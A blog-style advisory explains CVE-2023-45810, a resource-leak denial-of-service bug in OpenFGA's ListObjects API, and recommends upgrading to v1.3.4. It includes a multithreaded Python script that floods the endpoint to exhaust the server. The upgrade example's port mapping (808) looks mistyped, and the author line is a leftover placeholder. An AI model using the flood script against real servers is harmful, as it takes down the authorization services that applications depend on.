CVE CyberSecurity Database News

CVE-2023-45810 - How OpenFGA’s ListObjects Bug Can Break Your Authorization Service

Poster -

OpenFGA is quickly becoming a popular choice among developers for flexible permissions and authorization logic, inspired by the famous Google Zanzibar paper. But like any fast-moving open-source project, OpenFGA isn’t immune to security flaws. In late 2023, security researchers found a resource management bug that could take down an entire OpenFGA instance. This post will break down CVE-2023-45810, explain how it works, and what you can do to stay safe.

What’s OpenFGA?

If you’re new to OpenFGA, it’s an open-source engine that allows developers to manage complex authorization logic and relationships. It provides a way to check if, for instance, a user can read a document or access some specific feature, by defining and querying relationships between users, resources, and actions.

> Official Repo: https://github.com/openfga/openfga
> Project Website: https://openfga.dev/

Summary

OpenFGA versions before 1.3.4 have a denial-of-service (DoS) flaw. If several clients make many ListObjects API calls, the server holds onto resources even after sending a response. Eventually, it can use up all available resources, making the entire OpenFGA service freeze or stop responding.

There's no workaround. The only fix is to upgrade.

Security References

- CVE entry
- GitHub Security Advisory
- Patch Release on GitHub

How Does the DoS Exploit Work?

The problematic area is the ListObjects API endpoint, which is typically used to fetch lists of resources — for example, “list all documents User X can read.” In some scenarios, when a client calls this endpoint repeatedly (with different or even the same parameters), server resources like goroutines, memory, or handles aren’t cleaned up after OpenFGA sends the response.

Example: Exploit with Python

Let’s see how an attacker (or even a misconfigured client) could accidentally or intentionally DoS your OpenFGA:

import requests
import threading

API_URL = "http://your.fga.server/v1/store/yourstoreid/list-objects";
HEADERS = {"Authorization": "Bearer YOUR_API_TOKEN", "Content-Type": "application/json"}

def flood_listobjects():
    data = {
        "type": "document",
        "relation": "reader",
        "user": "user:bob"
    }
    while True:
        try:
            response = requests.post(API_URL, json=data, headers=HEADERS)
            print(f"Status: {response.status_code}")
        except Exception as e:
            print(f"Error: {e}")

threads = []
for _ in range(100):
    t = threading.Thread(target=flood_listobjects)
    t.start()
    threads.append(t)

Very soon, the server runs out of resources and becomes unresponsive.

Note: This is only for educational demonstration. Do not use this against anyone else's system.

Impact: When Things Go Very Wrong

If your OpenFGA instance is publicly accessible or exposed to busy internal clients, this vulnerability means:

- Your authentication/authorization checks can grind to a halt.

No new permissions queries get processed until the server is restarted.

- In worst-case scenarios, your entire app may become unavailable or unsafe if it depends on OpenFGA for access controls.

Fix: How to Stay Safe

The OpenFGA team has already patched this issue in version 1.3.4. The fix ensures that all server-side resources associated with ListObjects calls are released right after responding.

Upgrade OpenFGA to at least v1.3.4.

- Release notes with details

No breaking changes: The fix is backwards compatible, so upgrade should be smooth.

3. Check for exposed endpoints: As a best practice, don’t expose OpenFGA APIs directly to untrusted networks.

If you’re running OpenFGA in Docker Compose or Kubernetes, just update your image tags

services:
  openfga:
    image: openfga/openfga:v1.3.4
    # ... your config

Or, with Docker CLI

docker pull openfga/openfga:v1.3.4
docker stop myopenfga
docker rm myopenfga
docker run -d --name myopenfga -p 808:808 openfga/openfga:v1.3.4

Conclusion

CVE-2023-45810 is a real-world example of how subtle resource leaks can have a giant impact on cutting-edge infrastructure. If you’re running OpenFGA, double-check your version and upgrade if needed. As OpenFGA adoption grows, it’s crucial to stay alert for new security advisories.

More Resources

- OpenFGA Documentation
- Google Zanzibar Paper

Questions or want to share your experience? Drop a comment below or check out the OpenFGA discussions on GitHub.


Authored by [YourNameHere], exclusive for this post. All findings are based on official releases and advisories—stay current, stay protected!

Timeline

Published on: 10/17/2023 23:15:12 UTC
Last modified on: 10/25/2023 13:38:33 UTC